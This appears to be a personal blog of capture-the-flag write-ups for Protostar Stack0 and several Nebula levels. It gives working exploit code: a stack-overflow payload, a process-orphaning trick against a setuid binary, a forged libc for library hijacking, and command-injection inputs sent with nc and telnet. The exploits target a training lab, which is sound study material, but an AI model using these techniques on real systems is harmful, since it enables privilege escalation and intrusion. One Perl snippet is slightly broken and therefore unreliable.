Protostar – Stack0

I used a buffer overflow to pass this challenge. The goal is to change the int modified variable to anything other than 0 so that the if statement code path will trigger. To do this we overflow the buffer[64] variable until it spills over into the modified variable.

!/bin/bash
CMD=";echo -en abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz123456789123\x01\x01\x01\x01";
$CMD | /opt/protostar/bin/stack0
Advertisements

Nebula – Level 19

Level 19 is another access/file trickery. The code only does interesting stuff if its parent is perceived to be a root processes. Luckily, init is run as root thus, if we start flag19 as a child and then kill the parent (don’t wait on the child); init becomes the parent (orphan processes policy).

#include <unistd.h>     /* Symbolic Constants */
#include <sys/types.h>  /* Primitive System Data Types */
#include <errno.h>      /* Errors */
#include <stdio.h>      /* Input/Output */
#include <sys/wait.h>   /* Wait for Process Termination */
#include <stdlib.h>     /* General Utilities */

int main() {
    pid_t childpid; /* variable to store the child's pid */
    int retval;     /* child process: user-provided return code */
    int status;     /* parent process: child's exit status */

    childpid = fork();

    if (childpid >= 0) { // success
        if (childpid == 0) {    // child
        char cmd[] = "/home/flag19/flag19";
            //char *args1[] = { cmd, "-c", "touch /home/flag19/team_awesome", NULL };
            char *args1[] = { "/bin/sh", "-c", "touch /home/flag19/team_awesome", NULL };
            char *args2[] = { NULL };
            //sleep(30);
            sleep(3);
            execve(cmd, args1, args2);

        } else {    // parent
        //waitpid(childpid, &status, 0);
        sleep(1);
            exit(1);
        }
    }
}

Nebula – Level 16

nc 192.168.1.118 1616
GET /index.cgi?password=team_awesome&username=-"%00
-team_awesome:team_awesome
ctrl + D

This challenge exploits arbitrary code execution and early string termination. Our assumption about the completion of this challenge is to get the perl server code to enter the “Set cookie” section.

Nebula – Level 15

There seem to be a few ways to solve this challenge. We chose to keep hacking on a chosen way until it worked. Basically, the flag15 program searches for libc in locations that we have the privilege to write. We place a shared library in a directory that flag15 is looking through so that it loads our library instead of the standard libc. The super duper tricky parts are: (1) making the library look like libc, (2) choosing a function that will get triggered from flag15, (2b) doing useful work in the trigger function.

1. Making the library look like libc required the version.script file
2. Many functions could be chosen. We went for an init level function.
2b. The super duper tricky part is that, without glibc, you don’t even have access to system calls. When we first started hacking on this exploit we intended to call a system call via assembly. This proved to be too hard (given our limited asm background). The solution provided links in libc’s static library so that we at least get the syscall() abstraction.

lib.c

# lib.c
#include <stdio.h>
#include <linux/unistd.h>
#include <sys/syscall.h>

void __cxa_finalize (void *d) {
//    dlopen("/lib/i386-linux-gnu/libc.so.6", RTLD_LAZY);
	return;
}

void __attribute__ ((constructor)) load_lib(void) {
//    dlopen("/lib/i386-linux-gnu/libc.so.6", RTLD_LAZY);
	printf("Constructor");
}

int __libc_start_main(int (*main) (int, char **, char **), int argc, char *argv, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void *stack_end) {
	char cmd[] = "/usr/bin/touch";
	char *arg1[] = { cmd, "/home/flag15/team_awesome", NULL };
	char *arg2[] = { NULL };
	syscall(__NR_execve, cmd, arg1, arg2);
}

Makefile

all:
	gcc -fPIC -c lib.c -o lib.o
	gcc -shared -Wl,-Bstatic,-soname,libc.so,--version-script,version.script -o libc-2.13.so lib.o -L/usr/lib/i386-linux-gnu/ -static -lc

clean:
	rm -f *.so *.o
#gcc -shared -Wl,-Bstatic,-soname,libc.so,--version-script,version.script,--whole-archive -o libc-2.13.so lib.o -L/usr/lib/i386-linux-gnu/ -static-libgcc -lc

version.script

GLIBC_2.0 {
};

Nebula – Level 14

Solution: 81415171c1111181-1818171c1-141e14101-1a151a161-13131a12151315131116151
and there is an invisible 0x0B at the end.

The encryption algorithm ads the array index position to the ascii value of the input character.

# decrypt.pl
#!/usr/bin/perl
my $line = ;
chomp($line);
my @lines;

for ($i=0; $i < length($line); $i++) {
    $lines[$i] = chr(ord(substr($line,$i,1)) - $i);
}
my $res = join(//, @lines);
print $res;

Nebula – Level 12

Program 12 is susceptible to arbitrary code execution. Languages that allow shell code execution via open() calls are often misused by programmers when they directly pass in a user parameter without a filter applied. To exploit this particular code you need only to end the echo command with a ‘;’ then append the command that you would like to run.

telnet localhost 50001
; echo "team awesome" > /home/flag12/team_awesome